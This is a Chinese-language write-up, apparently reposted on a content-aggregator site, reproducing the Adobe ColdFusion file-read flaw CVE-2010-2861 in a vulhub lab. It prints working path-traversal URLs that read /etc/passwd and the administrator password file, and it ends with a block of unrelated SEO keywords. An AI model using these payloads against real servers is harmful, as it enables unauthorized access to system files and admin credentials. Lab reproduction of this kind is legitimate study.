千家信息网

web安全中Adobe ColdFusion文件读取漏洞CVE-2010-2861的示例分析

发表于:2025-02-01 作者:千家信息网编辑
千家信息网最后更新 2025年02月01日,这篇文章主要介绍了web安全中Adobe ColdFusion文件读取漏洞CVE-2010-2861的示例分析,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编
千家信息网最后更新 2025年02月01日web安全中Adobe ColdFusion文件读取漏洞CVE-2010-2861的示例分析

这篇文章主要介绍了web安全中Adobe ColdFusion文件读取漏洞CVE-2010-2861的示例分析,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。

Adobe ColdFusion(直译:冷聚变),是一个动态Web服务器,其CFML(ColdFusion Markup Language)是一种程序设计语言,类似JSP里的JSTL(JSP Standard Tag Lib),从1995年开始开发,其设计思想被一些人认为非常先进,被一些语言所借鉴。

Coldfusion 最早是由 Allaire 公司开发的一种应用服务器平台,其运行的 CFML(ColdFusion Markup Language)针对Web应用的一种脚本语言。文件以*.cfm为文件名,在ColdFusion专用的应用服务器环境下运行。在 Allaire 公司被 Macromedia 公司收购以后,推出了 Macromedia ColdFusion 5.0,类似于其他的应用程序语言,cfm文件被编译器翻译为对应的 c++ 语言程序,然后运行并向浏览器返回结果。 虽然 .cfc 和 custom tag 具有类似的重用性,但 cfc 提供了更加灵活的调用方式,例如 webservice 方式的调用支持。

本文仅作漏洞复现记录与实现,利用流程如下:

1.漏洞环境

链接:http://192.168.101.152:8500/

访问http://192.168.101.152:8500/CFIDE/administrator/enter.cfm后是这样的

使用vulhub搭建漏洞环境的话需要初始化环境,初始密码为admin,输入后等待初始环境完成即可

2.漏洞利用

使用burp重放访问

http://192.168.101.152:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwden

直接使用浏览器访问有时可能会因为url编码无法读取

读取到了/etc/passwd文件内容

访问

http://192.168.101.152:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.propertiesen

读取后台管理员密码

有时候无法读取可以尝试删除cookie值

感谢你能够认真阅读完这篇文章,希望小编分享的"web安全中Adobe ColdFusion文件读取漏洞CVE-2010-2861的示例分析"这篇文章对大家有帮助,同时也希望大家多多支持,关注行业资讯频道,更多相关知识等着你来学习!

文件 漏洞 环境 语言 篇文章 应用 公司 服务器 程序 服务 运行 安全 示例 分析 密码 方式 浏览器 开发 支持 浏览 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 C刊在CSSCI数据库找不到 域名和服务器怎么收费 数据库原理及习题答案 软件开发合同税率是多少 贵州网络技术公司有什么优惠政策 网络安全维护技术咨询成果 北京软件开发学校培训机构 网络安全及相关法律法规的认识 女生学计算机网络技术多吗 网络电视机顶盒软件开发自学 网络安全保障技术关键要素 电信服务器名 中国网络安全法简读 绍兴电脑软件开发需要学什么 如何软件开发票 php 数据库编码 济南地区联想服务器零售 方舟手游官方服务器会关闭吗 互联网图片高清图片科技 软件开发涉税风险案例 网络安全知识库答案 django电影数据库 软件开发工作量测试题 贵州网络技术公司有什么优惠政策 2017网络安全宣传片 博乐新华互联网科技 网络安全运营工程是做什么的 荔湾区品质网络技术开发价格多少 医院网络安全管理 信息监理软件开发月报
0